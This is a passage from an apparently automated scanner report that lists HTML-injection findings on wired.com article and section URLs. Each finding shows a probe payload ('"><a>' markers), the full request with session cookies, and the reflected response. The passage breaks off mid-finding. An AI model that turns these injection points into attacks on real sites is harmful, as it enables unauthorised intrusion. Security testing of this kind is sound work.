1.535. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c9a"><a>b4bd5c0f5f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/newsf6c9a"><a>b4bd5c0f5f4/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:52 GMT
Date: Sun, 21 Nov 2010 23:06:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_newsf6c9a"><a>b4bd5c0f5f4">
...[SNIP]...

1.536. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bee7"><a>1f9ffde2136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture3bee7"><a>1f9ffde2136/lifestyle/news/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture3bee7"><a>1f9ffde2136 ss_lifestyle c_news">
...[SNIP]...

1.537. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d26d"><a>83866788be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle1d26d"><a>83866788be7/news/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:40 GMT
Date: Sun, 21 Nov 2010 23:06:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle1d26d"><a>83866788be7 c_news">
...[SNIP]...

1.538. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fee"><a>4d894af57f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/newsf1fee"><a>4d894af57f2/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:04 GMT
Date: Sun, 21 Nov 2010 23:07:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_newsf1fee"><a>4d894af57f2">
...[SNIP]...

1.539. http://www.wired.com/customerservice [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /customerservice

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c3"><a>d95b402d7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /customerservice839c3"><a>d95b402d7c8 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Mon, 22 Nov 2010 01:13:02 GMT
Date: Mon, 22 Nov 2010 01:09:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_customerservice839c3"><a>d95b402d7c8">
...[SNIP]...

1.540. http://www.wired.com/entertainment [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ac8"><a>98e7490e5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainmenta7ac8"><a>98e7490e5ae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainmenta7ac8"><a>98e7490e5ae">
...[SNIP]...

1.541. http://www.wired.com/entertainment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df5b"><a>b5f8392314c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment5df5b"><a>b5f8392314c/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Sun, 21 Nov 2010 20:16:27 GMT
Date: Sun, 21 Nov 2010 20:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment5df5b"><a>b5f8392314c">
...[SNIP]...

1.542. http://www.wired.com/entertainment/hollywood [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/hollywood

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f82"><a>c6b1ca3f8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment94f82"><a>c6b1ca3f8f7/hollywood HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:30 GMT
Date: Sun, 21 Nov 2010 23:07:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment94f82"><a>c6b1ca3f8f7 ss_hollywood">
...[SNIP]...

1.543. http://www.wired.com/entertainment/hollywood [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/hollywood

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5fc"><a>d3f7037435e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/hollywoodce5fc"><a>d3f7037435e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=574
Expires: Sun, 21 Nov 2010 23:17:52 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_hollywoodce5fc"><a>d3f7037435e">
...[SNIP]...

1.544. http://www.wired.com/entertainment/music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 224ea"><a>7c815694db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment224ea"><a>7c815694db5/music HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:32 GMT
Date: Sun, 21 Nov 2010 23:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment224ea"><a>7c815694db5 ss_music">
...[SNIP]...

1.545. http://www.wired.com/entertainment/music [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9b2"><a>b28c0d05be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music3c9b2"><a>b28c0d05be9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music3c9b2"><a>b28c0d05be9">
...[SNIP]...

1.546. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3385f"><a>f8dbe2114f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment3385f"><a>f8dbe2114f4/music/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment3385f"><a>f8dbe2114f4 ss_music c_news">
...[SNIP]...

1.547. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db81"><a>8eb418e94bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music4db81"><a>8eb418e94bf/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:21 GMT
Date: Sun, 21 Nov 2010 23:07:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music4db81"><a>8eb418e94bf c_news">
...[SNIP]...

1.548. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d39"><a>b304160c724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music/news70d39"><a>b304160c724/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news70d39"><a>b304160c724">
...[SNIP]...

1.549. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f72e"><a>b56d3b0469f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment8f72e"><a>b56d3b0469f/music/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:29 GMT
Date: Sun, 21 Nov 2010 23:07:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment8f72e"><a>b56d3b0469f ss_music c_news">
...[SNIP]...

1.550. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8292"><a>527abd9bf12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/musicd8292"><a>527abd9bf12/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_musicd8292"><a>527abd9bf12 c_news">
...[SNIP]...

1.551. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

